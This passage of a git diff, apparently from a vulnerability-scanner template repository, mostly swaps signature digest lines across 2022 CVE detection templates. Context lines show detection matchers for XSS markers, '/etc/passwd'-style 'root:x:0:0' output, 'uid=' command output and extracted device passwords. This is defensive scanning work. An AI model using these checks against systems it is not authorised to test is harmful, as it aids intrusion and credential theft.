490a0046304402202fd1ae689fa8bb866a05272347f286b107487d47b90ae3435d75afd61a2f1bc502200d01e3f31f6a1964ea58452533684db62f413c6a080a8b638769d09d1a1bc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 48846eef9c..fcbe967b91 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cdd4318d7c194aab2715822710f278ab82b1651453ebb3d4fa447815c8ac0420220108b44251c0d6176d3b3045e9d38ede9a7cce2af1db1f24d9018e82017746b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 4705c7210a..89c31aba06 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "") && contains(tolower(body), "microweber")' condition: and -# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206fbc6363a21e215c4088ba1c478b277a020ccfd4743bb1fd653ac8ea2b22dee10220223560bfe8904b8edcc45c1702c6f885c1c3ea0cd937c8cd5314038cae3d2bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index d775902a68..e0d39b9c4b 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afc71e48780f00d753b36650ae9376d9ff5d62d05d54b2641dea06b932cddf160220307a30290659da0cc5ebe89a2a93a90d5d7649a83dfa79c8b7d890418c11a6df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index 2fc11ed28c..e4572dee99 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -59,4 +59,4 @@ http: - 'alert(document.domain)<\"?cmd=') condition: and -# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d3aa75f62ca681d073b7ab892f622924275b4009c67f756924cad1e5daa37f9022014c85f00463e095d3182f81a8b2d169bbc44fc5b9cdca6f68726e085a1bea425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 575a68ce83..5b8abf2e39 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -58,4 +58,4 @@ http: - '([A-Z0-9a-z]+)<\/sys\.passwd>' - '([a-z]+)<\/sys\.su\.name>' part: body -# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220149f7ca21aac4b71f5a33d4548153c1b0a7c3c100a2b77ed57dc7fc5f96c1cc502204fd7f13d1c37f716696bf4f38e4de79a49ebc1b4588f8b21e6d288698fda9402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 86cc26f3f5..6e5153487e 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -47,4 +47,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abc7aa49e5941cb2a9d2ee0de03d8e18d1da55b525d10e20e077160782032d2a022027d0514cc16f81114e92b428ed56360c1b99e06ab3b0ed892fcfa30a348e356a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 0e4fd8bcb3..855828c20f 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c7c635fcddb3574cb590e6287bc14534231ea48016d7df139749489a9d39b55022100d44004e450e95e1a53f364391d558635281fbca45027dca2e61e204f9bf30a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 08d0ce7a43..5d27da4da4 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdd086dd1a17565d574c9530a08fe2b147d4f7395ef1efdf1f9787694640fdaa022100857b6f32081121e52fc813c0523b17c3e3298527dd6932018cacfe32ffbeaba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 2efff32f32..435486fe0c 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a34dd1ca95502ddc06425b7db0df2eeadd4152a60791ac939fb1fd11801f83c022100c7e7579fbd0b0c4294066b8f4962dfeed2907abb3699efdaaa7f1b0787549672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 7de45889d4..7ac287b4bc 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009190562abaa99ad2a4520a31b3144b2ebc306c30ce72a5c5aed9a44e80629a25022100ed58b7ec72a0fdfc08d0d13b612a2449663ae80cfc83485bfa07d06cb8265947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 471a1e56b4..9afab472eb 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e386f3a032ed9c40ec34bfc8c0428067801c0681aa3a567fdc3d485453f0fb30221009a49981731cfe6d9203e892924f97cdf84ad1240b81d7cb66bcec31728fce7a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 21de1b1035..22243be7e6 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220517ca1dce8d4d311ecbc72009be25a53b0ccf3bcc93670f195b5f037608dfef0022100e45d38b599b8695586de222b078c5ebb059c93246d3d687afc08bf6e5710226a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204cf78920462298830f71beb379e86294e94300dd59b67af49df75493b7599cfa022100e80c5a8fec05c3a959799266bee27cbccca63fa16b5466bb5a6232861f435b73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index d132165ace..d6ab2d2988 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b418327814695f2dde30896d5d929847414387c3e416c53917658d56c4a36e022100f2c689ea06f9aff6d04515404d8fb43dd338049c386513b191816bfb77a749fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index bd71b9e337..9b9751eb70 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8ab03284ce3101015e6cc8ba6bc61aa1905269e608b9dc08dcabcbd0dfaeb9c02202c7268c78cb7a7c34997055366784ac927cc98a49b4129332cac2acfb03ec527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 26d84ff584..ec8eba166e 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f92b564c2b29b540ff7a71e2952bc2a0b88dbe6ec122dc7d33ef9b07171d2e12022100fa211d158d102b4e01860ac1c4a06f9ffea30e427d8f9ee02ae46b16c7fc0ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 6a6add0649..d87d4ea90d 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b349fbc017fdba9616a667d7a762c1f50f724c5f91c70a65aa366774b1b44c17022100991acb8def276e72b096d3d82bf30714f276c63f597a3bc6c7a8d081234e4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index e90c595780..8059932da0 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048a957ea315cda5158879633e7d1a9b9683968ba1e22c6a01182a9cefda01cb302207357834ea37eeeeda27e521ceb5393dfbeecd41a419d6723744689af5de0eca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index ad06d8b20c..e6174ed181 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b3bfaf0de960fab463d8540d70b2864984c245fd9e15ebc01e3c417717247c2022100f3b615543eec162a1023a3c7c5853d87123f232f6963c36a974cee8b904a0066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 0d7981b750..b69e643396 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100984a856baae58dc3e147e9b54be9ea0320e1de616dd77a24260ab31d7c960317022036015f3b1574b6389509de757babe634875fb340ea1df10e6cc35ae70731b151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index d623bf0f7b..e287a58f1b 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bdce3a51113de9797187207490b4d62655420827c2eeb08473dca4a223fecb702205c18fa71b1a27b1d88d7488fcb1d6e37c59afd91b4126fd896b7ff5a3b483f9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index d0a786ab3d..8bfa02f8eb 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ce2ffc6a17e3f2b3ddfb651568f839ab45cb0567e2bd94445e09fbed7346238022100b4f5bacb5906cc60494dc7cf4bab91bfe12422698053070bc95a6946c6daea30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index a2ca9e2c53..d0402ebb9e 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -61,4 +61,4 @@ http: - "" - "" condition: or -# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100845419d44065b50c37fab39b1e683dedf38eefee4f0faa02533e4113e7f778be0221009201523b6d6927684f96818d2ee156378a5622630cff3802a54c0c9bba20daa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 990cc6514d..31149b221d 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008358efa98f1659a8acdfdf875cbdf57539d9af5fd3afa08aad0f78d94a19647e022100fedb225932f440ffe47bfa9c175726d6fe7851f5dcc285b125280eb8c4785c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 692efb5b87..ccdc23581a 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d82b266b0760fde1b26ab005ed128cfe7c783b52db28f94bc666c9d03bb196002210098ccdcab8e372c1dd43317407e690f228e8cb1bc1c8add5c95870ceb805b2713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index d2afd30ad4..aac718e87b 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdd94dee1919cc8d6393b4c5b93877f86f1e3902db9224e1f60452181ed7cd0d02205c5bf1988230e6bedb3df553df98e9159911c2e33c23c6cfb719f22c24c4c678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index 5637fd770c..aff68e65ae 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093892776ac58ed3cff91e703bb80e1bf1161e8fea7a074829798365aa59f1bff022012199730a0afc1aa13db3aa5858c749a852f4408a16607c8900e828578f2abe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index ed663ceefd..75b2455996 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' condition: and -# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026587a83402b1749f4184e74887cbdb11b76fa3babfbaaca23f485f832acfb1c0221009d0bab1fee3284c96da02ba80b50f6a6bf4451f2d11720563477e861357c7123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index e7b76c15b0..ec0a19e4d3 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea967c58be9ee6e85f2d1b08d1ee67741217d6aaf46a182af695e818b7a6f87b02206f095eaf60a0bcbafd8ab25b1a9895a5e83c2e0373e6663abffa5bd72148c22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 038cde1a2b..dd5e534d12 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204beecdbcc5ba3242e3e6bc99461018a43b5570894e3dc4b82e2a50797986c16602203a02e7e47f3caa501d526ad0e4e35674e451f3790695f645ad78b82d1a9a7e83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index ee5bcbd447..2157353306 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -77,4 +77,4 @@ http: regex: - "dt:'(.*?)',cu:" internal: true -# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f20e7567adf3a56f95951ba59eb8535745343dcae3fae71ac2a2db83fb1286ee02206508ef63e55e81530039cf11f1390490f01ed9e7ea2b69daa05e9c88c0550ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 48df8a1532..fd4bce5deb 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -61,4 +61,4 @@ http: - "status_code == 200" - "contains(body_1, 'index')" condition: and -# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c70996a4a8c38a88dc646bf740938b97bf24325e79666a7d1393068ca7ed8940220587f2c2d6f95043be60b8517a39e886248d1cd5fac6b0c403d6d3ed4b9ffb925:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 0ead5380fd..447decc05c 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -55,4 +55,4 @@ http: - type: regex regex: - "root:[x*]:0:0" -# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f43fc6e5b13f0b620358143cd5c2ff407fbc6cb26341d0dbe5c90554ffa83cdb02205188ff403319366f2a4a75f3fa868ac2c1f22242edea24886fc92e7538df16cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 47cefc2342..e58b7b62ab 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -74,4 +74,4 @@ http: group: 1 regex: - 'uid=.*\(([a-z]+)\):' -# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c31ea7cf01b41bb3cf4831dc223219a13abe7c716e184cce211cdca3c37cf4e80221009c6def3de8f68c0ac8ccbab72192a11fb9cd5946f13b784d7d0c78d82695b96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 252a79d46f..8ffb2f30a9 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ab7914b9539f109141d9e54dbb45670f383a8e97df145ac9bf53aa249da1310022100fa01474f7d8f45f1c0ca0ed2c7a156e755f044800755d6f932f68461e2a43b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index dd4d1fcfa6..b1e6ede97a 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -74,4 +74,4 @@ http: regex: - "(.*?)" internal: true -# digest: 4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100959083cf9c14ebab619f9f72c4d74ac9c80d618d8d704aa0db0f6ddeb03dc79e022100dfb2e831eb99a1fbce5f67994458b466862f7455bd32ddfd0d478c31345f258c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index cf8c6b4dbf..6df92ce710 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 